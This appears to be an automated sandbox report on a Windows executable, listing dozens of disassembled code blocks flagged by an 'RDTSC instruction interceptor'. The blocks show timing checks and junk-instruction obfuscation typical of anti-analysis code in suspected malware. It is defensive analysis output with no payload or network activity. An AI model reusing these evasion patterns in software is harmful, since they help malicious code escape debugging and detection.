Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C480BF second address: C48127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx ecx, ax 0x0000000b lea eax, dword ptr [ebp+1247DE5Ch] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC41CC2F0C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b call 00007FC41CC2F0D6h 0x00000030 clc 0x00000031 pop edi 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC41CC2F0D9h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48127 second address: C4812C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4812C second address: C28147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jno 00007FC41CC2F0D4h 0x00000010 nop 0x00000011 sub dword ptr [ebp+12475220h], eax 0x00000017 call dword ptr [ebp+122D1ADBh] 0x0000001d push ecx 0x0000001e jg 00007FC41CC2F0C8h 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007FC41CC2F0D4h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48696 second address: C486A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CDAB666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C486A0 second address: C486E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FC41CC2F0EBh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CC2F0D9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4885C second address: C488B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 xchg eax, esi 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC41CDAB668h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+1244A67Fh], eax 0x00000029 call 00007FC41CDAB679h 0x0000002e mov dx, bx 0x00000031 pop edx 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489AC second address: C489B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489B0 second address: C489F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC41CDAB678h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC41CDAB676h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489F9 second address: C48A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48A16 second address: C48A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48B0C second address: C48B20 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48B20 second address: C48B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB66Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4945E second address: C49493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jng 00007FC41CC2F0C8h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC41CC2F0D9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C49545 second address: C495AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC41CDAB668h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov di, si 0x00000031 lea eax, dword ptr [ebp+1247DEA0h] 0x00000037 movzx edi, cx 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FC41CDAB66Fh 0x00000041 pushad 0x00000042 jp 00007FC41CDAB666h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78E99 second address: C78EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC41CC2F0CFh 0x0000000d jng 00007FC41CC2F0C6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79158 second address: C79165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FC41CDAB66Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79165 second address: C7916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7916C second address: C79189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jnc 00007FC41CDAB672h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79189 second address: C7918D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7918D second address: C79191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79191 second address: C79197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28C7B second address: C28C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28C81 second address: C28C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28C85 second address: C28C8F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79320 second address: C79340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FC41CC2F0C8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79340 second address: C79347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C886 second address: C7C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8B7 second address: C7C8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CDAB666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB671h 0x00000013 jno 00007FC41CDAB66Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8E0 second address: C7C8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8E8 second address: C7C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8EC second address: C7C8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8F0 second address: C7C8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81559 second address: C81587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC41CC2F0D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81587 second address: C8158F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8158F second address: C81599 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81599 second address: C815A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8188B second address: C818AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC41CC2F0D2h 0x0000000a jne 00007FC41CC2F0CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81BD4 second address: C81BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81E8D second address: C81EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jns 00007FC41CC2F0C6h 0x0000000f jns 00007FC41CC2F0C6h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81EA3 second address: C81EA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C81EA8 second address: C81EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82014 second address: C8201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82349 second address: C82374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FC41CC2F0C6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82374 second address: C8237A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8237A second address: C82387 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FC41CC2F0C6h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C824EE second address: C824F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0626C second address: C06270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06270 second address: C0628E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 jbe 00007FC41CDAB666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FC41CDAB66Eh 0x00000016 jns 00007FC41CDAB666h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0628E second address: C06296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06296 second address: C0629A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0629A second address: C062AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C062AE second address: C062CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC41CDAB66Eh 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C062CB second address: C062D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC41CC2F0C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AE9A second address: C8AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FC41CDAB66Eh 0x0000000b jmp 00007FC41CDAB66Dh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C89F25 second address: C89F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8992B second address: C8992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8A628 second address: C8A64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41CC2F0C6h 0x0000000a jmp 00007FC41CC2F0D9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8A64B second address: C8A653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8A653 second address: C8A657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8A8B0 second address: C8A8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FC41CDAB666h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8A8C1 second address: C8A8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8AB9F second address: C8ABD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC41CDAB671h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FC41CDAB666h 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FC41CDAB666h 0x0000001a jno 00007FC41CDAB666h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jno 00007FC41CDAB666h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8ABD7 second address: C8ABDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E7B6 second address: C8E7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E7BC second address: C8E7C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E7C4 second address: C8E7CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E1D2 second address: C8E1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E1D9 second address: C8E1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E1E1 second address: C8E205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FC41CC2F0E6h 0x0000000d jmp 00007FC41CC2F0D4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E337 second address: C8E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC41CDAB673h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9055A second address: C9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9055E second address: C9056F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9056F second address: C9057D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9BEEC second address: C9BEF6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CDAB684h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C18E second address: C9C196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C196 second address: C9C19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C19B second address: C9C1A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C1A7 second address: C9C1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FC41CDAB675h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C1C5 second address: C9C1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9C448 second address: C9C488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FC41C7769D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnc 00007FC41C7769D6h 0x0000001e jo 00007FC41C7769D6h 0x00000024 jmp 00007FC41C7769E0h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9F079 second address: C9F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9F224 second address: C9F22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9F22A second address: C9F232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6654 second address: CA6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6659 second address: CA6661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4840 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA485C second address: CA4866 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC41D10CDDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4866 second address: CA486E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA49D4 second address: CA49E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA49E0 second address: CA4A03 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41C7769D6h 0x00000008 jmp 00007FC41C7769E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FC41C7769D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
